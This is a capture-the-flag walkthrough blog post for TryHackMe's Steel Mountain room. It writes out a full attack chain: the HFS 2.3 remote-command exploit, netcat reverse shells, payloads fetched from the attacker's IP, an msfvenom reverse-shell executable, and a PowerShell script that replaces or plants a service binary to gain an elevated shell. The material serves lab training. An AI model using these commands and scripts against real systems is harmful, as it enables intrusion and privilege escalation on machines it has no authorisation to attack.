TryHackMe — Steel Mountain w/o MSF

Clarence Subia
3 min read · Sep 5, 2020


Use PowerShell commands and winPEAS to enumerate the system and collect the information needed to escalate privileges.

Machine Information:

[1] Nmap scan

sudo nmap -A -T4 -p- 10.10.255.1 -oN nmap_scan

(-T on its own is not a valid option; it needs a timing template such as -T4. -A enables version and OS detection plus default scripts, -p- scans all 65535 TCP ports, and -oN saves the result. The scan should show HttpFileServer (HFS) 2.3 listening on 8080, which is the service attacked below.)

[2] Research the vulnerability

searchsploit hfs 2.3
searchsploit -x 39161

EDB-ID 39161 is "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)", a Python 2 script. Read it with -x, then copy it into the working directory as exploit.py for the next steps.

[3] Edit the exploit

Near the top of the script, set ip_addr to the attacking machine's IP (10.11.17.48 here) and local_port to the port the netcat listener will use (4444). The script makes the target fetch nc.exe from http://<ip_addr>/nc.exe and then connect back to ip_addr:local_port, which is why the next two steps serve nc.exe on port 80 and listen on 4444.

[4] Set up an HTTP server to serve nc.exe and winPEAS

sudo python -m SimpleHTTPServer 80

Run this from the directory containing nc.exe and winPEAS.exe (and later the msfvenom payload), since the server exposes its working directory. SimpleHTTPServer is Python 2; on Python 3 the equivalent is python3 -m http.server 80.

[5] Set up a netcat listener, then run the exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080

The listener port must match local_port from step 3, and 8080 is the HFS port found by nmap. If the first run only fetches nc.exe and no shell arrives, run the exploit a second time.

[6] Download winPEAS for privilege escalation

powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe"

This is run in the shell obtained in step 5; winPEAS.exe must be in the directory served by the HTTP server from step 4.

[7] Run winPEAS

winPEAS.exe

In the services section of the output, look for a service whose binary or directory the current user can modify. Here that is AdvancedSystemCareService9, whose binary is ASCService.exe; the remaining steps replace that binary with a reverse shell.

[8] Create the msfvenom payload and set up a second netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234

The payload is named after the service binary it will replace and must be saved into the HTTP server's directory. It uses a separate port (1234) so the first shell on 4444 stays open. Only msfvenom is used to build the executable; no Metasploit handler is involved.

[9] Stop the service

sc stop AdvancedSystemCareService9

The running service holds its executable open, so it has to be stopped before the file can be replaced. If this is typed in a PowerShell prompt rather than cmd, use sc.exe, because sc alone is PowerShell's alias for Set-Content.

[10] Download the payload into the service's directory, then start the service

powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9

Change into the directory of the service binary first so the download overwrites the original ASCService.exe (rename the original beforehand if you want to restore it afterwards). Starting the service then executes the payload, and the listener on port 1234 receives the elevated shell.
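The service-hijack procedure in steps 9 and 10 as one added PowerShell script, not code from the original write-up. It first checks what the write-up takes for granted (the service's binary path, the account it runs as, whether the directory is actually writable, and whether the current user may stop the service) before swapping the binary, and it also handles the other way a writable service path shows up in winPEAS output: an unquoted path containing spaces. It assumes, as in the write-up, that the attacking box is 10.11.17.48 serving ASCService.exe over HTTP on port 80 and that the service name is the one winPEAS reported; the function names are this example's own.

```powershell
# Added example, not code from the original write-up. Assumptions: attacker
# host 10.11.17.48 serves ASCService.exe on port 80 (as in the write-up) and
# the service name below is the one winPEAS flagged.
$ServiceName = 'AdvancedSystemCareService9'
$PayloadUrl  = 'http://10.11.17.48/ASCService.exe'

# ACL entries are easy to misread, so test write access empirically.
function Test-DirWritable([string]$Dir) {
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try {
        New-Item -Path $probe -ItemType File -ErrorAction Stop | Out-Null
        Remove-Item $probe -Force
        return $true
    } catch { return $false }
}

# For an unquoted path with spaces, CreateProcess tries every space-delimited
# prefix (with .exe appended) before it reaches the real binary.
function Get-UnquotedPathCandidates([string]$Path) {
    $parts = $Path -split ' '
    for ($i = 0; $i -lt $parts.Count - 1; $i++) {
        ($parts[0..$i] -join ' ') + '.exe'
    }
}

$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
if (-not $svc) { throw "Service '$ServiceName' not found" }
"Binary : $($svc.PathName)"
"Runs as: $($svc.StartName)"    # LocalSystem is what makes the hijack worthwhile

# Separate the executable from any arguments, whether or not the path is quoted.
$quoted = $svc.PathName.StartsWith('"')
if ($quoted) { $exePath = ($svc.PathName -split '"')[1] }
else         { $exePath = [regex]::Match($svc.PathName, '^.*?\.exe', 'IgnoreCase').Value }
$dir = Split-Path $exePath -Parent

if (Test-DirWritable $dir) {
    # The write-up's vector: the service directory is writable, so replace the binary.
    "Service directory $dir is writable; replacing $exePath"
    # Bare 'sc' is PowerShell's alias for Set-Content, so call sc.exe explicitly.
    sc.exe stop $ServiceName | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Cannot stop $ServiceName; this user lacks SERVICE_STOP" }
    Start-Sleep -Seconds 3                       # let the old process exit and release its file
    Move-Item $exePath "$exePath.bak" -Force     # keep the original to restore afterwards
    Invoke-WebRequest -Uri $PayloadUrl -OutFile $exePath -UseBasicParsing
    sc.exe start $ServiceName                    # payload runs as the service account
}
elseif (-not $quoted -and $exePath -match ' ') {
    # Unquoted-path vector: plant the payload at the first prefix whose directory is writable.
    $target = Get-UnquotedPathCandidates $exePath |
              Where-Object { Test-DirWritable (Split-Path $_ -Parent) } |
              Select-Object -First 1
    if ($target) {
        "Unquoted path; planting payload at $target"
        Invoke-WebRequest -Uri $PayloadUrl -OutFile $target -UseBasicParsing
        sc.exe stop $ServiceName | Out-Null
        Start-Sleep -Seconds 3
        sc.exe start $ServiceName
    } else { "Unquoted path, but no prefix directory is writable" }
}
else { "No writable-path vector here; check the service's own permissions (e.g. with accesschk) instead" }
```

Run it from the shell obtained in step 5 with the listener from step 8 already waiting on port 1234. The empirical write test matters because a directory whose ACL looks restrictive can still be writable through a group the user belongs to, and the exit-code check after sc.exe stop catches the other common failure, a user who can write the binary but cannot restart the service (in which case a reboot, if permitted, is the fallback).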

References:

https://tryhackme.com/room/steelmountain

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Written by Clarence Subia, Network Engineer / Penetration Tester